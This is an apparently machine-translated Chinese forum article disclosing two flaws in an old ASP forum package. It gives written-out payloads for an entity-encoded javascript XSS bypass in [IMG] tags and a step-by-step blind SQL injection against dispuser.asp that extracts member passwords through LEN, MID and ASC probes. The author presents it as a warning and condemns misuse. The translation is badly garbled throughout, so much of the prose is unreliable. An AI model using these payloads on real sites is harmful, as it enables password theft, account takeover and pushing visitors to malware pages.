As an excellent ASP Forum in China, the mobile network forum is deeply loved by the videoli and netizens, but since it is a process.
Ordered code, it is impossible to be perfect. Here, I have to say that it is popular in two vulnerabilities.
(Good yeah! Say it quickly, I'm going to find the forum of the original deletion of my post, FAINT, don't hold this
The following article is seen below.
1, this vulnerability is not too serious, people who use the over-the network forum know, write JavaScript directly when posting
Filter split, write HTTP will automatically add a link, the vulnerability is here, in these two places, put two words
A letter is replaced by the form, then the system decodes the letter to the letter, and the purpose of avoiding filtration is reached.
. Example illustrates, write [IMG] Javas & # x63ript: window.open ('htt & # x70: // www)
5dmedia.com ',' ') [/ img] clearly saw that #X63 decoded letters are "c", # x70 decoded letters
Yes "P", and play the connection, finally add [IMG], so that JS is triggered, if the forum supports Flash insert,
SWF] can also be. Using this vulnerability, you can do some pranks, write the tempting theme, and take the result is his home page (
Lieni, advertise), even more, even to a web page with viruses, Trojans, let you think about the mother. This
A vulnerability exists in various versions of the mobile network, including the new 0519 version, which is a wide range of coverage, individual think
Some illegal characters should be detected, not simple and sing, I really hope that the mobile network developers can do it.
Early metal this loophole.
2, compared to the former, the second vulnerability problem is big, using this vulnerability can crack away all registered members on the forum
Password (horror ~~~), because the forum administrator usually directly puts the forum program, then use it.
The picture is convenient to lead to the emergence of vulnerabilities, and we also put it back, just look at the database of the network,
Know the field of the password is UserPassword, followed by, for example, to break a user password called ABC, first look at AB
C user information, the given connection is http: //xxxxx/dispuser.asp? name = ABC, in DISPUSER.ASP
The statement of reading parameters is: username = trim (Request ("name")), the statement of the database query is:
SQL = "Select * from [user] where username = '" & username & "'", can be seen, ABC
It is directly used as a parameter username for Dispuer. In addition, if the user does not exist, the program will give
Tip, in this case, we will write a condition for query password, plus it behind where username = ABC
And userpassword = "******", theoretically, you can achieve the crack of the password, but this breaks
In the year, now, now I am going to the VBS function, I can use the LEN function to try the number of password bits.
, Add this HTTP: //xxxxx/dispuser.asp? Name = ABC '% 20and% 20LEN (UserPassword) = 5
% 20AND% 20'1 '=' 1, this may not understand, put it in the SQL statement is actually this: SQL = "Select * from [user] where username = 'ABC' and LEN (userpassword) = 5 and '1' = '1' "
Now I understand,% 20 is space, the single quotes behind the ABC and the single quotes in '1' = '1 are for SQ
l The statement match. Strange, the user does not exist, oh? Then explain the user who meets this condition, continues, put
5 Replace to 6, 7, 8, according to such push, as long as the user information can be displayed, the number of password bits will be given. Next
What to do is to try each password, continue to use VBS, you can use Left or Right or MID functions, HT
TP: //xxxxx/dispuser.asp? Name = ABC '% 20and% 20LEFT (userpassword, 1) =' a, if you guessed
Just give the user information, guess the wrong tips, this user does not exist, so too slow, then outside
Set another ASC function, http://xxxxx/dispuser.asp? Name = abc '% 20and% 20ASC (MID (Userpasswo
RD, 1, 1))> '50 Try out whether the ASCII code of the user password is greater than 50, constantly narrowing the range, I believe soon can be
The range is reduced to the number of digits, see if you surprised a cold sweat, at least I, relying on a few functions
Live use, the conservancy says that the password can be broken without half an hour. Really unfortunate, the new developer is behind
After the 05 ** version used MD5 encryption, this is finally reliable, but there are many places in China.
The version of the mobile network forum (including a small famous flash site), I still need to explain it here,
This alert.
Postscript: I have been very concerned when writing this article, I don't know if this article is in the middle of someone else.
Here I advise: Any destruction of the forum order, illegally stolen the password of others is extremely immoral,
Please yourself!
